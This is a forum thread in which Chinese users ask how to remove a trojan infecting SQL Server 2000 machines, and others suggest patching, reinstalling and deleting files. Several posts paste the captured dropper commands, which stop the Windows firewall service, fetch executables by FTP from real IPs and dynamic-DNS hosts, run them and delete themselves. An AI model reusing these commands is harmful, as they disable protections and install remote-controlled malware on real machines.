110,539
社区成员
发帖
与我相关
我的任务
分享装SQL server就100%中毒,请高手指点解决方法
最近老是发现自动增加很多cmd进程,只要一装SQL server就100%中毒,它们也不增加系统资源,但是杀死这个进程后不久又会自动添加上来。通过跟踪和观察发现这些cmd进程sqlserver进程生成的。这些cmd进程执行如下两个批处理代码
第一个:
"C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess
&echo open 61.160.212.45>dboy.sys
&echo wunai>>dboy.sys
&echo wunai$>>dboy.sys
&echo get ver.exe C:\boots.exe>>dboy.sys
&echo bye>>dboy.sys
&echo ftp -s:dboy.sys>dboy.bat
&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe
&echo start start /high "" C:\WINDOWS\system32\inf\test.exe
&echo start C:\boots.exe>>dboy.bat
&echo start C:\boots.exe>>dboy.bat
&echo del dboy.sys>>dboy.bat
&echo del %0>>dboy.bat&dboy.bat
第二个
"C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess
&echo open ddosboy1.3322.org >dboy1.sys
&echo dboy>>dboy1.sys
&echo if>>dboy1.sys
&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys
&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat
&system1.bat
这很明显是病毒通过cmd批处理调用dboy.sys。
经查系统system32下有dboy.sys和dboy1.sys,另外还有一个dboy.bat
这两个文件的代码如下
第一个:
open 218.61.11.180
12369
14789
get wm.exe C:\boots.exe
bye
第二个:
open ddosboy1.3322.org
dboy
if
get dboy1.exe C:\Windows\tcpsrv1.exe
bye
第三个bat文件
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0
然后c盘根目录拷贝boots.exe到c:\WINDOWS\system32\inf\test.exe
然后运行这个test.exe文件
在上面代码中提到的这些文件test.exe、boots.exe、tcpsrv1.exe、system1.bat都没有发现。
我分析可能是病毒在copy过程中被杀毒软件阻止,然后上述这些文件就没有生成,但是执行copy任务的批处理cmd却滞留在了进程中。
所以我可以在进程中发现他们的踪迹。
不知大家有没有中过类似的病毒,是我下载的SQLSERVER2000本身就有病毒还是其它原因
但是如何把这些讨厌的病毒赶尽杀绝呢?sqlserver肯定是不能删除的,那样工程就搞大了。不知道哪位大侠有什么其他高招呢?谢谢先咯。
第一个:
"C:\WINDOWS\system32\cmd.exe" /c net1 stop sharedaccess
&echo open 61.160.212.45>dboy.sys
&echo wunai>>dboy.sys
&echo wunai$>>dboy.sys
&echo get ver.exe C:\boots.exe>>dboy.sys
&echo bye>>dboy.sys
&echo ftp -s:dboy.sys>dboy.bat
&echo copy C:\boots.exeC:\WINDOWS\system32\inf\test.exe
&echo start start /high "" C:\WINDOWS\system32\inf\test.exe
&echo start C:\boots.exe>>dboy.bat
&echo start C:\boots.exe>>dboy.bat
&echo del dboy.sys>>dboy.bat
&echo del %0>>dboy.bat&dboy.bat
第二个
"C:\WINDOWS\system32\cmd.exe" /c sc stop sharedaccess
&echo open ddosboy1.3322.org >dboy1.sys
&echo dboy>>dboy1.sys
&echo if>>dboy1.sys
&echo get dboy1.exe C:\Windows\tcpsrv1.exe>>dboy1.sys
&echo bye>>dboy1.sys&echo ftp -s:dboy1.sys>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo start C:\Windows\tcpsrv1.exe>>system1.bat
&echo del dboy1.sys>>system1.bat&echo del %0>>system1.bat
&system1.bat
这很明显是病毒通过cmd批处理调用dboy.sys。
经查系统system32下有dboy.sys和dboy1.sys,另外还有一个dboy.bat
这两个文件的代码如下
第一个:
open 218.61.11.180
12369
14789
get wm.exe C:\boots.exe
bye
第二个:
open ddosboy1.3322.org
dboy
if
get dboy1.exe C:\Windows\tcpsrv1.exe
bye
第三个bat文件
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0
然后c盘根目录拷贝boots.exe到c:\WINDOWS\system32\inf\test.exe
然后运行这个test.exe文件
在上面代码中提到的这些文件test.exe、boots.exe、tcpsrv1.exe、system1.bat都没有发现。
我分析可能是病毒在copy过程中被杀毒软件阻止,然后上述这些文件就没有生成,但是执行copy任务的批处理cmd却滞留在了进程中。
所以我可以在进程中发现他们的踪迹。
不知大家有没有中过类似的病毒,是我下载的SQLSERVER2000本身就有病毒还是其它原因
但是如何把这些讨厌的病毒赶尽杀绝呢?sqlserver肯定是不能删除的,那样工程就搞大了。不知道哪位大侠有什么其他高招呢?谢谢先咯。
...全文
请发表友善的回复…
发表回复
jeason_jun 2008-11-21
- 打赏
- 举报
你SQLSEVER 的安装包有 病毒吧??
建议 重新找个安装包 来装
建议 重新找个安装包 来装
zx005 2008-11-21
- 打赏
- 举报
把补丁保存到机子上,然后断网,安装SqlServer,打补丁,在连接网络
cdgrom123 2008-11-21
- 打赏
- 举报
省事的办法是装个专杀杀一杀,然后作系统,格掉安装SQL Server和Office的硬盘,重装SQLServer后别开服务,先去微软把所有补丁都装上,然后装卡巴斯基,省级病毒库后在启动SQL Server
cdgrom123 2008-11-21
- 打赏
- 举报
你要把所有的下载器删除
对方用下载器通过FTP传输木马和病毒
然后封掉FTP
清理Sql Server 和Office 2003,最好是在新系统完成这些,然后覆盖到现在的硬盘上
对方用下载器通过FTP传输木马和病毒
然后封掉FTP
清理Sql Server 和Office 2003,最好是在新系统完成这些,然后覆盖到现在的硬盘上
ccdbar 2008-09-30
- 打赏
- 举报
绑定特殊的程序了吧
iloveppmm 2008-09-30
- 打赏
- 举报
曾经遇到过
hometohome 2008-09-29
- 打赏
- 举报
我也遇到这种情况了2003R2,sql2000个人版sp4,不知道怎么解决?
NowtAngell 2008-09-28
- 打赏
- 举报
呵呵,UP
重装系统,就算你不重新安装,很多的文件绝对被病毒破坏了
不过SQL2000只要打了SP3补丁 基本上就不会被入侵了吧..还有系统补丁文件
以前不打,总被别人用钩子监听..后来打了就监听不到了.我纳闷..
重装系统,就算你不重新安装,很多的文件绝对被病毒破坏了
不过SQL2000只要打了SP3补丁 基本上就不会被入侵了吧..还有系统补丁文件
以前不打,总被别人用钩子监听..后来打了就监听不到了.我纳闷..
angelababa~ 2008-09-28
- 打赏
- 举报
别装了
ttgss 2008-09-28
- 打赏
- 举报
是不是遭攻击了.我把远程登陆的rpc关了.改了下sa的密码.把那几个sys文件删了.
在system32下边还有叫jay的文件夹.把里的文件内容改成空的了.
现在cmd.com还没出来.呆两天再看看这个木马还不出出来.
在system32下边还有叫jay的文件夹.把里的文件内容改成空的了.
现在cmd.com还没出来.呆两天再看看这个木马还不出出来.
ttgss 2008-09-28
- 打赏
- 举报
还有.我是通过adsl拨号上的网
贴上网上的有关于这个问题的地址.各位可以看一下.:
http://bbs.ikaka.com/showtopic.aspx?topicid=8546064&onlyauthor=1
http://bbs.crsky.com/read.php?tid=1457628
贴上网上的有关于这个问题的地址.各位可以看一下.:
http://bbs.ikaka.com/showtopic.aspx?topicid=8546064&onlyauthor=1
http://bbs.crsky.com/read.php?tid=1457628
ttgss 2008-09-28
- 打赏
- 举报
但是杀死这个进程后不久又会自动添加上来。通过跟踪和观察发现这些cmd进程sqlserver进程生成的。这些cmd进程执行如下两个批处理代码
楼主.你是怎么跟踪和观察的能说一下吗????????.我的机子有你说的问题了.我的sql4in1.也是从网上下的.可能就是这个原因.
-------------------------------------
在我的机子上:cmd.com还时不时的运行.还好有卡吧斯机终止了.要不然就over.了.
网上说这是灰鸽子.下了专杀不管事儿啊.
下面是我机子上几个.sys文件的内容:
有这几个文件在system32下边:system1.bat dboy.sys dboy.bat tencent.sys sysme.bat
ftp -s:dboy1.sys
start C:\Windows\tcpsrv1.exe
start C:\Windows\tcpsrv1.exe
del dboy1.sys
del %0
=================
open 218.93.205.132
ping
555666
get 99.exe C:\boots.exe
bye
===================
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0
==============
open emdx.3322.org
123
123
get 1.exe C:\tmd.exe
bye
===================
ftp -s:tencent.sys
start C:\tmd.exe
start C:\tmd.exe
del tencent.sys
del %0
===================================================================
我机子是server2003 sq2 36中提示的系统补丁都安上了.
有哪们兄弟知道灰鸽子是传播的途径是什么,是怎么传播的啊.
这个问题要怎么解决啊.
楼主.你是怎么跟踪和观察的能说一下吗????????.我的机子有你说的问题了.我的sql4in1.也是从网上下的.可能就是这个原因.
-------------------------------------
在我的机子上:cmd.com还时不时的运行.还好有卡吧斯机终止了.要不然就over.了.
网上说这是灰鸽子.下了专杀不管事儿啊.
下面是我机子上几个.sys文件的内容:
有这几个文件在system32下边:system1.bat dboy.sys dboy.bat tencent.sys sysme.bat
ftp -s:dboy1.sys
start C:\Windows\tcpsrv1.exe
start C:\Windows\tcpsrv1.exe
del dboy1.sys
del %0
=================
open 218.93.205.132
ping
555666
get 99.exe C:\boots.exe
bye
===================
ftp -s:dboy.sys
start C:\boots.exe
start C:\boots.exe
del dboy.sys
del %0
==============
open emdx.3322.org
123
123
get 1.exe C:\tmd.exe
bye
===================
ftp -s:tencent.sys
start C:\tmd.exe
start C:\tmd.exe
del tencent.sys
del %0
===================================================================
我机子是server2003 sq2 36中提示的系统补丁都安上了.
有哪们兄弟知道灰鸽子是传播的途径是什么,是怎么传播的啊.
这个问题要怎么解决啊.
sendling 2008-09-17
- 打赏
- 举报
在打开注册表
搜索dboy等,找到对应删除
搜索dboy等,找到对应删除
sendling 2008-09-17
- 打赏
- 举报
我也中这个这些毒,我把这些文件用杀毒软件上粉碎文件工具粉碎了,如瑞星卡卡,360,金山清理都有这个粉碎工具
ChinaZYH 2008-09-17
- 打赏
- 举报
我想你装的可能就是Sql server 2000吧,你在安装sql server 2000之前,先把sp4补丁下载到硬盘,然后断网再安装sql server 2000,安装结束后再打sp4.sp4的下载地址是:
http://www.microsoft.com/downloads/details.aspx?FamilyID=8e2dfc8d-c20e-4446-99a9-b7f0213f8bc5&DisplayLang=zh-cn
http://www.microsoft.com/downloads/details.aspx?FamilyID=8e2dfc8d-c20e-4446-99a9-b7f0213f8bc5&DisplayLang=zh-cn
blackshow1 2008-09-17
- 打赏
- 举报
我也是这种情况,硬盘所有区全格式化重装也不行,郁闷ing。。。
Wesley 2008-09-16
- 打赏
- 举报
没遇到过,呵呵
mjlovewen 2008-09-15
- 打赏
- 举报
装个系统比较徹底一点。。。
LovingAlison 2008-09-15
- 打赏
- 举报
那就先杀毒 实在不行就先装系统 再装sql
Odesky 2008-09-15
- 打赏
- 举报
过滤关键字
加载更多回复(3)
